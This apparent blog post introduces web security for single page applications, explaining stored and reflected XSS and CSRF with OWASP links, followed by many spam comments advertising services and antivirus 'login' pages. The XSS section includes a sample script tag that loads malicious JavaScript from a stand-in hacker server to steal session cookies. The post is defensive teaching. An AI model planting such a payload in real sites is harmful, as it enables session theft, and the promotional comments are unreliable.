Security Measures for Your Single Page Application

Building a secured application is always a puzzle for many of us. This is so true when you  need to secure a Single Page Java Web application where many things are happening on the browser which is not in your control.  This post discusses this problem along with some of the popular preventive measures available today to secure your  single page web application.

What is Single Page Application?

In earlier days web browsers were not  really powerful as we see them today.  We used to build web applications by moving most of the processing logic to the server, leaving browser as a simple mean to render the DOM returned by server. Simple user action like clicking a button, scrolling page were all handled on server. Over a period browsers became more rich in terms of functionalities and we have witnessed JavaScript emerging as powerful scripting language.

A single-page application (SPA) is a web application that interacts with the user by dynamically rewriting the current page rather than loading entire new pages from a server. In other words,  a single page application  makes use of modern browser capabilities and responds to user actions such as clicking a button,  navigating to new page etc according to the logic defined in the JavaScript running on the browser.  Let us go ahead and  take a look at some of the common security attacks and some preventive measures for them.

Common Security Attacks

The security attacks discussed in this section are not really unique to SPA, rather they are applicable for any web application per se. However SPAs are more vulnerable to attack as major portion  of the UI code is running on browser leaving all traces of user actions and server interactions on the browser running on end-user's machine.

Cross site scripting (XSS)

Cross site scripting (XSS) is a very common attack that injects malicious code into a vulnerable web application. There are two categories of XSS attacks:

Stored or Persistent XSS

Stored or Persistent XSS attacks happen when an application takes user input without validating the contents and save it on server database. Later when user navigates to a page which displays the user input from previous page, server retrieves this data from database and embeds the content in HTML DOM without proper HTML escaping.
For example, consider a  page with a field that allows user to add comments. If there is no proper validation for this field, a hacker may try adding HTML script tags as value for this field. This can be link to malicious JavaScript file from a server owned by hacker as shown here:  <script src=”http://some-server.com/malicious-script.js”> </script>  Web app fails to prevent such input, and stores it as value for comment field. When the application displays this comment later, the browser parses the JavaScript tag that was added as value for comment and any  regular HTML tag. This malicious script can harm the user in many ways. For instance, the script can contain code to POST customer data such as session cookie, unsecured access token etc to a REST API owned by hacker. A hacker can use this information later for hacking the user account.

Reflective XSS

In the case of reflective XSS, the malicious script is injected by appending to the URL.  Let us take  an example to get more clear picture. Suppose a hacker is visiting a site , for e.g: www.jobinesh.com.  As next  hacker may try appending some arbitrary parameter value to URL and if the site responds back with parameter typed as is without properly escaping it, then this site may be vulnerable for reflective XSS attack.  Here is an example: https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

You can learn more about XSS here: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Here are some options to prevent XSS: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet


Cross-Site Request Forgery (CSRF)

Cross site request forgery (CSRF),  is an attack that steals the current user's logged-in session from browser(via Session Cookie)  and uses that stolen session to execute unwanted action in an application to which a user is logged in.

You can learn more about CSRF here: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
To learn on preventive measures, visit the following link:  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet




Comments

  1. Nice journal terribly fascinating and helpful info on your website. Thanks for sharing the journal and this nice info that is certainly about to facilitate us. We will be updating this post with new information to our knowledge box.

    Cheapest dedicated

    ReplyDelete
  2. Network security is made up of the hardware, software, policies and procedures designed to defend against both internal and external threats to our company’s computer systems. The basic needs are clearly defined over here. Thank you.

    ReplyDelete
  3. Network Security is a considering fact in the world of information technology. Network Security Solution Providers played an important role in defending these kind of cyber attacks.

    ReplyDelete
  4. Nice Blog Post, it's very informative regarding IELTS courses. keep sharing.....thanks

    IELTS Coaching Institute in Jaipur

    ReplyDelete
  5. This comment has been removed by the author.

    ReplyDelete
  6. I read your blog now share great information here. Web Designer

    ReplyDelete
  7. Comfortabl y, the post is really the freshest on that deserving topic. I harmonise with your conclusions and definitely will thirstily look forward to your next updates.

    white label website builder

    ReplyDelete
  8. Thank you for the link building list.I am going jot down this because it will help me a lot.Great blog! Please keep on posting such blog.

    private label website builder

    ReplyDelete
  9. Comfortabl y, the post is really the freshest on that deserving topic. I harmonise with your conclusions and definitely will thirstily look forward to your next updates.

    website builder for reseller

    ReplyDelete
  10. I am thankful to this blog giving unique and helpful knowledge about this topic. Software Outsourcing Services

    ReplyDelete
  11. Thank you for your valuable content , Easy to understand and follow. As said, the migration to cloud is very essential for the protection of the database.

    Cloud Migration services
    Aws Cloud Migration services
    Azure Cloud Migration services
    Vmware Cloud Migration services
    Database Migration services
    Lia Infraservices

    ReplyDelete
  12. These are really amazing and valuable websites you have share with us. Thanks for the informative post.
    Keep posting like these information.
    WordPress development company in Chennai

    ReplyDelete
  13. I am definitely enjoying your website. You definitely have some great insight and great stories.
    Windows VPS Hosting India

    ReplyDelete
  14. Thank you for the informative post about Security challenges in AWS , Found it useful . cloud migration services have now become secured and with no-risk

    Cloud Migration services

    Aws Cloud Migration services

    Azure Cloud Migration services

    ReplyDelete
  15. I have gone through your post and I found it very helpfull. Looking forward to see more post from you.
    Vmware Cloud Migration services

    Database Migration services

    ReplyDelete
  16. I am really impressed with the way of writing of this blog. The author has shared the info in a crisp and short way.
    Lia Infraservices

    ReplyDelete
  17. We are a part of the success story for many of our customer's successful cloud Migrations.
    Cloud Migration services


    Best Cloud Migration Tool

    ReplyDelete
  18. Thanks for sharing this blog. i'm really impresses with this blog. it teaches me a lot.
    web design training programs
    php institute in chennai
    magento course in chennai

    ReplyDelete
  19. The ethereumpro our website is one of the world's most prominent ethereum mining profitability calculator that is working for excavators wherever all through the world. It is an enrolled site having a brilliant working history in mining. Likewise, giving surprising associations to their customers. The decision highlight of this site is it enrolled. Additionally, check from a wide extent of accidents or fakes. Visit our site it is secure for this system.

    ReplyDelete
  20. In present era where cyberattacks have become normal, this blog helped me in understanding Business Security Solutions Houstoncan avoid normal security flaws within a given network.

    ReplyDelete

  21. I went through your blog its really interesting and holds an informative content. Thanks for uploading such a wonderful blog.
    python classes near Bellandur|python classes in Marathahalli
    selenium testing classes in Bangalore|selenium testing classes near Bellandur

    ReplyDelete
  22. thanks for your information really good and very nice web design company in velachery

    ReplyDelete
  23. Thanks for this blog. I have found some interesting blogs on google. You can check these blogs also which are related to technologies…..
    Avast Login
    garmin.com/express
    avg login
    bullguard login
    mcafee.com/activate

    ReplyDelete
  24. The registrations and auditions for the Bigg Boss 13 are going to start soon. The official list of contestants is not yet announced by the officials. That will be announced by the makers on the inaugural day which is 15 the of September. bigg boss 13 contestants name list with photo and details Though a few rumored names are coming up as the expected celebrity contestants of the year. They are Nia Sharma, Raghav Juyal, Punit Pathak, Divyanka Tripathi, Garima Chaurasia, Ridhima Pandit, Aditya Narayan, Jasmin Bhasin, Zain Imam, Bhuvan Bam, Chetna Pande, Krystle D’Souza, and Devoleena Bhattacharjee. This year too, the show will be back with a new theme and the star host, Salman Khan. Though the theme is not declared yet officially. Stay tuned with us to know more about the show Bigg Boss 13.

    ReplyDelete
  25. The registrations and auditions for the Bigg Boss 13 are going to start soon. The official list of contestants is not yet announced by the officials. That will be announced by the makers on the inaugural day which is 15 the of September. bigg boss 13 contestants name list with photo Though a few rumored names are coming up as the expected celebrity contestants of the year. They are Nia Sharma, Raghav Juyal, Punit Pathak, Divyanka Tripathi, Garima Chaurasia, Ridhima Pandit, Aditya Narayan, Jasmin Bhasin, Zain Imam, Bhuvan Bam, Chetna Pande, Krystle D’Souza, and Devoleena Bhattacharjee. This year too, the show will be back with a new theme and the star host, Salman Khan. Though the theme is not declared yet officially. Stay tuned with us to know more about the show Bigg Boss 13.

    ReplyDelete
  26. The great information that you shared. It will help all of them. Thanks for posting. Keep maintain the updates
    PHP Development Companies in Chennai
    |
    PHP Development Company
    |
    PHP web development services
    |

    ReplyDelete
  27. The article was up to the point and described the information very effectively. Thanks to blog author for wonderful and informative post.
    website designing Pakistan

    ReplyDelete
  28. Nice blog, thanks for sharing with us this interesting blog. Visit OGEN Infosystem for Website Designing and PPC Services in Delhi, India.
    Web Development Company

    ReplyDelete
  29. Office Login is the best way to get office 365 download because it need .Create account on Microsoft from Official site and get login instant. You can create office account as student or Microsoft user. You can continue with any to download office.
    If facing any issue after all, so make call to support executive or can take online help to solve the problem.


    Office Login
    Bullguard Login
    Mcafee Login
    AVG Login
    Norton Login
    webroot login
    webroot.com/safe
    Turbotax Login

    ReplyDelete
  30. Now you can download office offline and online both. Office facilitates to activate it online.For that you have need of activation key and go to official site, login your account and enter valid key and activate it.Other wise you can install and then put key and activate offline also on your computer system successfully. If you get any of problem on your computer so contact to the support team .

    Bullguard Login
    Office Login
    Office Login
    Mcafee Login
    AVG Login
    Norton Login
    webroot login
    webroot.com/safe
    Turbotax Login

    ReplyDelete

Post a Comment

Disclaimer

The views expressed on this blog are my own and do not necessarily reflect the views of my employer.